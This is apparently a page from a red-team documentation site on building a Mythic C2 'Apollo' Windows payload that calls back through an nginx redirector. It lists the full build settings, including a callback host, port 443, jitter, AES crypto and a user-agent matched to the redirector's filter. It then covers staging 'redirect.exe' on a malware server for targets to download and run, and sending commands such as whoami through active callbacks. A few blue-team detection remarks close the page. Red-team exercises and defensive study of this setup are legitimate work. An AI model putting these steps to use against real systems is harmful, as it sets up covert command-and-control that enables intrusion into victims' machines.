NGINX CONDITIONAL REDIRECTION IMPLEMENTATION

this specific payload creation is for use with nginx custom conditional redirection.

root@oco:~$ BROWSER > {MythicC2} > Create > Create Payload
 Target OS: Windows
 Payload Type: Apollo
 Build Parameters: WinExe
 Build Cmds into Agents: All
 C2 Profiles: HTTP
  #this is the nginx machine
  Callback Host: nuclear.{domain}.{tld}              //this is the nginx vm/redirector ip/fqdn - the nginx redirector will be responsible for forwarding the traffic back to this C2 server NOT the payload agents!
  Callback Interval in seconds: 10
  Callback Jitter in percent: 23
  #the agent deployed on the target will callback to nginx via 443
  Callback Port: 443
  Crypto Type: aes256_hmac
  Get request URI: index
  HTTP Headers:
   #this user-agent string MUST match the one configured in the c2.conf of nginx configuration file in /etc/nginx/conf.d
   User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
    - ALT value: IPv4 address if used in
       if ($http_user_agent ~ "41.2.228.0") of the /etc/nginx/conf.d file
  
  Kill Date: default
  Name of Query...: default
  Perform Key Exhange: default
  POST request URI...: default
  Proxy Host: default
  Proxy Password: default
  Proxy Port: default
  Proxy Username: default
 Payload Review
  Payload Name: redirect.exe
  Create Payload

 * this payload can be downloaded from the payload section via the download URL
    - once downloaded by the red team operator, it MUST be transferred to the Payload/Malware Server
       - the target(s) downloads these payloads from the payload server
#example trigger
PS C:\target> {payload}.exe

MythicC2 > Active Callbacks
 Interaction: whoami
 Interaction: ps
 
 * since everything is happening via TLS/SSL connection, the blue team won't be able
   to see/decrypt the cmds that were executed
    - blue teams should be able to see an outbound ssl/tls connection to the IP of the
      exposed redirector (aws cloudfront)see 
    - blue teams should also be able to see running processes w/ pids
    - some indicators should also be visible via Windows Event Logs
       - for thorough analysis, implement sysmon on the hosts and send the
         logs to SIEM
PreviousAZURE FRONT DOOR IMPLEMENTATIONNextMITRE CALDERA

Last updated